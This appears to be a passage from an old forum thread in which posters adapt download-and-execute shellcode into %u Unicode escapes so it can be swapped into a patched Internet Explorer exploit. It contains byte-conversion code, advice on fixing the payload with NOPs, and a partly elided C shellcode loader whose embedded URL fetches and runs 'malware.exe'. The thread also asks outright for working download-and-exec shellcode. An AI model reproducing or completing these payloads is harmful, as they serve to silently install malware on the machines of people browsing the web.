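console.log("correct", bytesToEscaped(FIRST_FOUR), "->", hex(escapedToBytes(bytesToEscaped(FIRST_FOUR))));
console.log("POC    %u43eb%u5756 ->", hex(escapedToBytes("%u43eb%u5756")));
// A related trap: a single-byte %XX escape is still one code unit, so
// unescape("%41") occupies two bytes (41 00) and cannot be mixed in freely.
console.log("%41    ->", hex(escapedToBytes("%41")));
```

Run with `node convert.js`. The decoded bytes show why a payload converted by simply keeping the reading order lands in memory byte-swapped, and the `%41` line shows that `%XX` escapes inject a zero high byte for every character, which is the kind of byte-level difference that decides whether a converted payload is the same sequence the author tested locally.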
[ Vojislav Milunovic @ 07.12.2004. 16:53 ] @
Well, the problem may be that the proggy assumes you'll download a certain file from some address, which will then be executed and the job is done; however, it's possible that the file doesn't get downloaded at all and instead of CreateProcess succeeding, you run into the end of the program, or to be more precise into your string table, where it blows up... I don't know what to tell you, buffer overflow techniques work, let's say, relatively, because there's always the worry that you won't hit the right buffer for eip... it's a strange business, and I don't know whether there hasn't been someone who dealt with buffer overflows and asked the question of how to find the buffer address without guessing... and for that method to always work =)
[ Sundance @ 18.12.2004. 06:58 ] @
Come on, for God's sake, install and set up SoftICE and have it catch application-level exceptions, then look at

1) where your exploit is
2) what's on the stack
3) what eip points to

and the fun can begin :)
[ Krajisnik @ 18.12.2004. 07:19 ] @
Look, the original POC exploit works 100%, and it has a unicoded Bindshell in it...
So the exploit itself doesn't need checking, because it works 100%.. Admittedly, it was patched a few days ago...
I only wanted to replace the part of the code where the bindshell is with my shell...
I tried that shell locally and it downloads the file, runs it, and everything works as it should.. Then I converted that same shellcode (without any modifications) into unicode format and put it into the exploit...
With the original exploit, IE just hangs and the bindshell starts in the background, while with my shell IE crashes, i.e. throws an error...
From that I concluded that I didn't convert my shellcode into unicode format correctly, or maybe some char isn't allowed in unicode, e.g. 0x00, I don't know, I'm guessing..
As for SoftICE, I know nothing about it, nor about debugging in general, so that part only one of you can do, if you have the time..
[ Krajisnik @ 18.12.2004. 18:44 ] @
Heh, I did it.. I had to put a few NOPs in front of the shellcode..
[ Vertyg01 @ 20.01.2005. 19:50 ] @
Is there a specific converter from hex (shellcode) to unicode, or maybe some table from which I could convert it?
[ Vojislav Milunovic @ 20.01.2005. 22:23 ] @
well, instead of \x90\x34 type %u9034, I think that will work
[ Vertyg01 @ 21.01.2005. 01:10 ] @
oh thanks, I hadn't noticed that before ;)
[ ocamis @ 07.07.2005. 03:51 ] @
Hi.

Can someone give a working example of code in unicode that downloads and execs 1.exe from the same site.
Or maybe explain how I can do it myself from this code
Code:

#include <windows.h>
#include <stdio.h>

char shellcode[]=
"\xEB\x0F\x58\x80\
........
"\x27\x39\x72\x6F\x72\x17"
"m00!"
"http://www.malware.com/malware.exe"
"\x01";

main()
  {
    int *ret;
    ret=(int*)&ret+2;
    (*ret)=(int)shellcode;
  }


Reply in English.
Thanks.
[ Sundance @ 07.07.2005. 07:27 ] @
Read this shit:

Building IA32 'Unicode-Proof' Shellcodes

At the end of the article you have common asm snippets written in a UNICODE-friendly way..